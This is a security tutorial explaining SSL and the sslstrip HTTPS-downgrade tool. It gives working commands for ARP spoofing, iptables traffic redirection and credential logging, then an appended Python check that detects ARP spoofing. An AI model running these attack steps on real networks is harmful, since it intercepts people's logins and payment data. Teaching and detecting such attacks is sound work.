Mastering SSLStrip Analysis: Uncovering Hidden Vulnerabilities

What is SSL (Secure Sockets Layer)?

SSL (Secure Sockets Layer) is a standard security technology used for establishing an encrypted channel between a server and a client, for example a web server (website) and a browser, or a mail server and a mail client.

SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text, leaving you vulnerable to eavesdropping. If an attacker is able to intercept (capture) the data being sent between a browser and a web server, they can see and use that information. HTTP sends data in plain text over the network. The HTTPS protocol is used to establish a secure channel between the browser (client) and the web server.

More specifically, SSL is a security protocol. Protocols describe how algorithms should be used; in this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.

More detail: https://www.digicert.com/ssl.htm

What is sslstrip?

Sslstrip is a tool used to downgrade HTTPS to HTTP. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.

How does sslstrip work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send the attacker all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).


Running sslstrip

Step 1: Enable IP forwarding

echo "1" > /proc/sys/net/ipv4/ip_forward


Step 2: Find out the network gateway

netstat -r


Step 3: Spoof MAC address with gateway MAC address using arpspoof

arpspoof -i <interface> -t <targetIP> <gatewayIP>

arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

Open a new terminal and run the following command:

arpspoof -i eth0 -t 192.168.1.1 192.168.1.5

Step 4: Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

Step 5: Write the results to a file (-w sslstrip.txt), listening on port 1000 (-l 1000):

sslstrip -w sslstrip.txt -l 1000
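
The ARP spoofing in Step 3 is visible from the target's side: its neighbor table shows the gateway IP resolving to a MAC address that also belongs to another host, or to a different MAC than it had before. The check below is an added example, not part of the original tutorial; the function names, the MAC addresses and the 192.168.1.66 host are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches `ip neigh` lines ("192.168.1.1 dev eth0 lladdr aa:bb:... REACHABLE")
# and `arp -an` lines ("? (192.168.1.1) at aa:bb:... [ether] on eth0").
ENTRY = re.compile(
    r"\(?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s+"
    r"(?:dev\s+\S+\s+lladdr|at)\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed samples: a clean `ip neigh` snapshot and a later `arp -an` one.
BASELINE = """\
192.168.1.1 dev eth0 lladdr 02:00:00:aa:00:01 REACHABLE
192.168.1.66 dev eth0 lladdr 02:00:00:aa:00:42 STALE
192.168.1.9 dev eth0  FAILED
"""
SPOOFED = """\
? (192.168.1.1) at 02:00:00:AA:00:42 [ether] on eth0
? (192.168.1.66) at 02:00:00:aa:00:42 [ether] on eth0
? (192.168.1.9) at <incomplete> on eth0
"""

def parse_neighbors(text):
    """Return {ip: mac} for resolved entries; unresolved rows are skipped."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_spoofing(current, gateway_ip, baseline=None):
    """Flag a gateway MAC shared with other IPs, or changed since baseline."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    gw_mac = current.get(gateway_ip)
    if gw_mac is not None:
        others = sorted(ip for ip in by_mac[gw_mac] if ip != gateway_ip)
        if others:
            findings.append(("gateway-mac-shared", gw_mac, others))
        if baseline and baseline.get(gateway_ip) not in (None, gw_mac):
            findings.append(("gateway-mac-changed", baseline[gateway_ip], gw_mac))
    return findings

if __name__ == "__main__":
    print(find_spoofing(parse_neighbors(SPOOFED), "192.168.1.1", parse_neighbors(BASELINE)))
```

A shared MAC can also come from proxy ARP or a multi-homed router, so a finding is a prompt to verify the gateway's real MAC address rather than proof of spoofing.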
